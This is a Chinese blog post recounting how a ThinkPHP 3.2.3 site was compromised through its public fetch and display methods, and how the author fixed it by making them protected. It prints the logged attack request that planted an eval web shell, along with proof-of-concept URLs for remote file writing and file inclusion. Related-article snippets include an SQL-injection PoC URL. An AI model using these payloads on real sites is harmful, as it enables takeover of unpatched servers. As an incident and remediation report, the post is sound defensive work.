记一次tp3.2.3因fetch导致的漏洞处理过程

最新推荐文章于 2024-05-16 09:31:14 发布
最新推荐文章于 2024-05-16 09:31:14 发布
阅读量1.5k 收藏
点赞数
分类专栏: PHP Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tiancityycf/article/details/106555608
版权
PHP 同时被 2 个专栏收录
99 篇文章 2 订阅
订阅专栏
Linux
66 篇文章 1 订阅
订阅专栏

参考:https://www.phpmianshi.com/?id=108

 

问题描述:

 

最近发现百度收录大幅度下降,并出现大量5xx错误,有些收录页面直接跳转到其他网站,如下图:

图片.png

 

 

问题追查

1.根据以往经验首先怀疑网站被植入或者挂马

          于是排查系统日志,因为php项目的植入基本是通过eval植入的,所以我们直接:

          grep eval   nginx.log   发现类似如下日志:

{ "@timestamp": "02/Jun/2020:22:26:21 +0800", "remote_addr": "10.105.193.11", "referer": "-", "request": "GET 
/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php>
 HTTP/1.1", "status": 200, "bytes": 5, "agent": "Mozilla/4.0 
(compatible; MSIE 9.0; Windows NT 6.1)", "x_forwarded": 
"185.207.155.138, 10.105.193.84", "up_addr": "unix:/tmp/php-cgi.sock","up_host": "-","up_resp_time": "0.021","request_time": "0.020" }

2.根据日志基本确定就是被植入了,结合我们网站和wap使用的框架,确定这是tp3.2.3的漏洞

            漏洞概述


            远程攻击者在无需任何权限情况下,可利用此漏洞构造恶意的url,向服务器写入任意内容的文件,达到getshell的目的。

 

    ​    ​    ​一共有两种方式植入:
    ​    ​    ​第一种是通过构造a参数的fetch方法,可以不需要知道文件路径就可以把php代码写入文件

    ​    ​    ​fetch函数的作用是获取页面内容,调用内置模板引擎fetch方法,thinkphp的模版引擎使用的是smarty,在smarty中当key和value可控时便可以形成模板注入。这里fetch函数的三个参数分别对应模板文件,输出内容,模板缓存前缀。利用时templateFile和prefix参数可以为空,在content参数传入待注入的php代码即可getshell

    ​    ​    ​第二种是通过构造a参数的display方法,实现任意内容包含漏洞

    ​    ​  ​display函数的作用是加载模板和页面输出

          所对应的参数为:
    ​    ​  ​$templateFile 指定要调用的模板文件

    ​    ​  ​$charset 模板输出字符集

    ​    ​  $contentType 输出类型,$content 模板输出内容。

    ​    ​  ​templateFile参数会经过parseTemplate函数处理,判断模板是否存在,当模板不存在时会在当前目录下开始查找,然后调用Thinkphp Controller 函数的display方法


 

3.实战演练

         我们通过fetch方法构造url如下:www.phpmianshi.com/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('test.php','<?php phpinfo(); ?>')</php>

         然后执行上面的url就可以在项目目录写入test.php  打印服务器的phpinfo信息,打开 www.phpmianshi.com/test.php 发现可以直接看到phpinfo

 

    ​    ​我们通过display方法构造url如下:www.phpmianshi.com/?a=display&templateFile=phpmianshi.txt

         然后执行上面的url就可以直接显示phpmianshi.txt的内容

 

         根据ThinkPHP框架规则,可以通过 g\m\a 参数指定分组(group)\模块(model)\动作或方法(action),我们打开 Application\Common\Controller 路径下的 BaseController.class.php 可以看到通过a参数直接调的这几个权限为 public 的方法

 

解决方案

1.这边有问题的是display函数和fetch函数,display 和 fetch 函数的修饰符改为 protected  即可修复

2. 修复完成后,我们再执行 第三步:实战演练中的操作,发现不会再有植入的代码,说明修复成功

 

 

 

私念
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Thinkphp3.2.3及以下版本漏洞整理
hackzkaq的博客
07-01 1万+
更多渗透技能 ,10余本电子书及渗透工具包,搜公众号:白帽子左一 中间件漏洞 一.RCE ThinkPHP3.2.3缓存函数设计缺陷可导致代码执行 概述 网站为了提高访问效率往往会将用户访问过的页面存入缓存来减少开销。 而Thinkphp 在使用缓存的时候是将数据序列化,然后存进一个 php 文件中,这使得命令执行等行为成为可能。 就是缓存函数设计不严格,导致攻击者可以插入恶意代码,直接getshell。 实验环境 redhat6+apache2+Mysql+php5+thinkphp3.2.3 漏洞.
【安全漏洞】ThinkPHP 3.2.3 漏洞复现.md
2201_75660665的博客
12-08 871
函数时没有参数传入,而我们找到的是有参数的,PHP7下起的ThinkPHP在调用有参函数却没有传入参数的情况下会报错,所以我们要选用PHP5而不选用PHP7.里的内容被存入了缓存文件php文件中,连带着我们输入的可控的php代码也在其中,然后包含了该文件,所以造成了命令执行。处,除了exp外,还有一处bind,这里同样也是用点拼接字符串,但是不同的是这里还拼接了一个冒号。,所以进入第二个分支,将我们的输入转化为十进制,恶意语句就被过滤了,后面就是正常的SQL语句了。最开始的字符传入的是0,才能去除掉冒号。
9-PHP代码审计——thinkphp3.2.3数据库内核注入漏洞
网络安全
04-29 574
漏洞利用的poc: http://www.tptest.com/index.php/home/index/index?username[0]=exp&username[1]==%27admin%27 数据库内核注入漏洞是thinkphp框架的数据库模块产生的漏洞,我们先通过一个案例来分析数据库操作模块的流程: 后台接收url请求中的username拼接到后台中执行,最终将查询到的内容返回,为了分析sql执行过程,开启debug调试模式。 class IndexContr..
【求大神帮助】thinkphp3.2.3老是被篡改入口文件
lieren141的博客
01-17 730
thinkphp3.2.3老是被篡改入口文件,有时候还要被修改Public里样式文件夹里的js 1.6.2 或1.7文件,改完后在百度里找到网站点击后就跳转到别的地方了,还有时候要被修改Think里面的Think.php文件。3、全总代码里的上传功能都干掉了,富文本框里的没有禁用(使用的是ueditor4.3)4、服务从windows换成linux再换成windows每次都要用安全狗扫一遍。6、安全狗扫出来的问题全部解决了,甚至把文件都删除了。2、几个文件夹设置了权限。5、安装了安全狗网站版。
thinkphp3.1漏洞_浅谈Thinkphp3.2.3反序列化漏洞_小白漏洞
最新发布
程序员六七的博客
05-16 507
我正在参加「掘金·启航计划」前言,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露
fetch请求php的坑,fetch请求问题
weixin_30026331的博客
03-28 500
首先, 数据要在网络上传输, 就会涉及到数据序列化的问题, 因为双边数据在内存中的形式极有可能不一样, 这个时候需要约定一种双边都认可并且能实现的序列化方式, 使得数据能够被发送方序列化, 并且在网络中传输, 最终被接收方正确的反序列化.为了适应不同的数据以及客户端环境, HTTP协议约定通过请求头中的Content-Type字段来确定数据序列化协议, 常用的有:application/x-www...
thinkphp3.2源码------ 错误和异常处理
小菜鸟正洋洋的博客
05-31 7064
写在前面:tp3.2中每次载入入口文件时都会进行错误和异常的捕获,解读这一部分代码可以对以后的优化很有好处。 处理概览:      错误捕获与处理: 致命错误捕获: 我们尝试在 Home/Index/index 下调用一个未定义的函数,会看到这样的提示页面:      我们可以看到tp3.2处理了致命异常的输出,并且
建站管家多语言企业建站系统 TP3.2.3
10-07
《建站管家》ThinkPHP3.2.3版本介绍: 1、基于ThinkPHP3.2.3的中英双语企业建站系统 2、可自行扩展多语言(默认中英文) 3、前台及后台均支持手机版+电脑版 4、自定义URL前缀 5、多级分类
layui框架实现文件上传及TP3.2.3(thinkPHP)对上传文件进行后台处理操作示例
10-18
主要介绍了layui框架实现文件上传及TP3.2.3对上传文件进行后台处理操作,结合实例形式分析了layui框架结合thinkPHP进行文件上传与处理操作相关实现技巧,需要的朋友可以参考下
TP3.2.3框架文件上传操作实例详解
10-15
主要介绍了TP3.2.3框架文件上传操作,结合实例形式详细分析了thinkPHP3.2.3框架文件上传相关原理、实现方法与操作注意事项,需要的朋友可以参考下
TP3.2.3倒计时.rar_FZK_cypt倒计时软件_thinkphp3.2.3_tp3.2倒计时_倒计时
09-23
这里我们关注的是一个基于ThinkPHP 3.2.3框架实现的倒计时解决方案,名为"TP3.2.3倒计时",由FZK_cypt开发。这个软件包主要提供了在网页上实时显示动态倒计时的能力,当设定的时间到达时,页面会自动切换到预设的...
基于tp3.2.3的博客前后台手机端API 前台 vue框架
04-18
标题中的“基于tp3.2.3的博客前后台手机端API”指的是使用ThinkPHP 3.2.3框架开发的用于博客应用的后端接口。ThinkPHP 3.2.3PHP的一个流行框架,它提供了MVC(模型-视图-控制器)架构模式,便于开发者构建Web应用...
TP3.2.3框架使用CKeditor编辑器在页面中上传图片的方法分析
10-15
主要介绍了TP3.2.3框架使用CKeditor编辑器在页面中上传图片的方法,结合实例形式分析了thinkPHP3.2.3框架使用CKeditor编辑器相关配置方法与操作注意事项,需要的朋友可以参考下
tp3.2.3带表情无限评论回复
04-16
8. **性能优化**:如使用缓存减少数据库查询次数,或者使用分页来限制一次加载的评论数量。 通过以上分析,我们可以了解到这个示例涵盖了从后端框架到前端交互的多个层面,对于想要提升ThinkPHP技能或学习评论系统...
TP3.2.3完全开发手册
06-02
TP3.2.3完全开发手册》是针对ThinkPHP 3.2.3框架的一份详尽指导文档,旨在帮助开发者深入理解和高效利用该PHP框架进行Web应用开发。ThinkPHP是一个快速、稳定且易用的PHP开发框架,它遵循MVC(Model-View-...
该内容被禁止访问原来是入口文件被恶意篡改
Nobita
02-12 688
检查index.php 发现,多了以下代码: <?php header('Content-Type:text/html;charset=gb2312'); $key= $_SERVER["HTTP_USER_AGENT"]; if(strpos($key,'google')!== false||strpos($key,'baidu')!==false||strpos($key,'sogou...
解决TP5项目被恶意篡改、注入代码问题
IT-Andy
07-03 7371
首先,谈谈这个曲折的经历! 第一次,被人用eval()函数注入了文件,发现后,我就禁了这些PHP高危险函数! 第二次,就是被人在入口文件中注入了代码,在public文件夹中,多出了很多文件。然后我就修改了宝塔面板的密码,加上下面的第2步,目前暂时没有被注入了,希望能帮到大家! 如果还有更好的办法,希望不吝赐教,留下你宝贵的经验,万分感谢! 1、禁掉...
项目入口文件index.php被篡改后果,为什么我把入口文件index.php移到public外面,再修改入口文件如下,但是无法显示页面...
weixin_36336411的博客
03-11 651
// +----------------------------------------------------------------------// | ThinkPHP [ WE CAN DO IT JUST THINK ]// +----------------------------------------------------------------------// | Copyri...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值